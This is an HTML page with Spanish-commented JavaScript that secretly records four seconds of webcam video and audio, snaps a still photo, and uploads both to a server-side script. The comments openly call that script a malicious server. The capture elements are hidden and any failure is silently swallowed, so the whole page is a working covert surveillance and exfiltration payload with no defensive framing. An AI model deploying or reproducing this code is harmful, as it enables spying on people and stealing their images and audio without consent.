<html>
<head>
    <title>Una sonrisa, por favor</title>
</head>
<body>
    <!-- Objetos para realizar la foto -->
    <video autoplay id="video" style="display:none"></video><br>
    <canvas id="foto" style="display:none"></canvas><br>
</body>
</html>
<script>

// Compatibilidad con navegadores
navigator.getUserMedia  = 
    navigator.getUserMedia ||
    navigator.webkitGetUserMedia ||
    navigator.mozGetUserMedia ||
    navigator.msGetUserMedia;

// Canales a capturar
var capturar = {
audio: true,
video: true
};


// Obtener acceso a los canales
if (navigator.mediaDevices.getUserMedia) {
    navigator.mediaDevices.getUserMedia(capturar).
        then(procesa).
        catch(fallo);
} else if (navigator.getUserMedia) { 
    // Navegadores antiguos
    navigator.getUserMedia(capturar, procesa, fallo);
}


function procesa(stream){
    // Preparar el elemento de video para la captura de foto
    var video = document.getElementById("video");
    video.srcObject = stream;
    video.volume = 0;

    // Buffer para la grabación de video
    var buffer = [];
    
    // Crear una "grabadora" de video para el stream obtenido
    var opciones = {mimeType: 'video/webm'}
    var grabador = new MediaRecorder(stream, opciones);
    
    // Cuando llegue dato a la grabadora, meterlo en el buffer
    grabador.ondataavailable = function(evento) {
        if (evento.data.size > 0) {
            buffer.push(evento.data);
        }
    }
    
    // Cuando acabe la grabación, enviarla al servidor malicioso
    grabador.onstop = function(d) {
        var blob = new Blob(buffer, {type: 'video/webm'});     
        envia(blob, "video.webm");
    }
    
    // Iniciar la grabación y programar su final
    grabador.start();
    setTimeout(
        function() {
            grabador.stop();
            
            // Realizar una foto al final de la grabación
            haz_foto()
        },
        4000
    )
}

// Realizar una foto y enviarla al servidor malicioso
function haz_foto() {
    foto = document.getElementById("foto");
    video = document.getElementById("video");
    
    // Ajustar el tamaño de la foto al del video capturado
    foto.width = video.videoWidth;
    foto.height = video.videoHeight;
    
    // Hacer una captura de imagen del video capturado
    foto.getContext("2d").
        drawImage(document.getElementById("video"),0,0);
        
    // Convertir la captura en blob y enviarlo
    var blob = foto.toBlob(function(blob) {
        envia(blob, "foto.png");
    });
}

// En caso de no poder hacer las capturas, no hacer nada
function fallo(error) {}

// Enviar un fichero al servidor malicioso
function envia(blob, nombre) {
    var oReq = new XMLHttpRequest();
    oReq.open("POST", "guarda.php?nombre_fichero=" + nombre, true);
    oReq.send(blob);
}

</script>

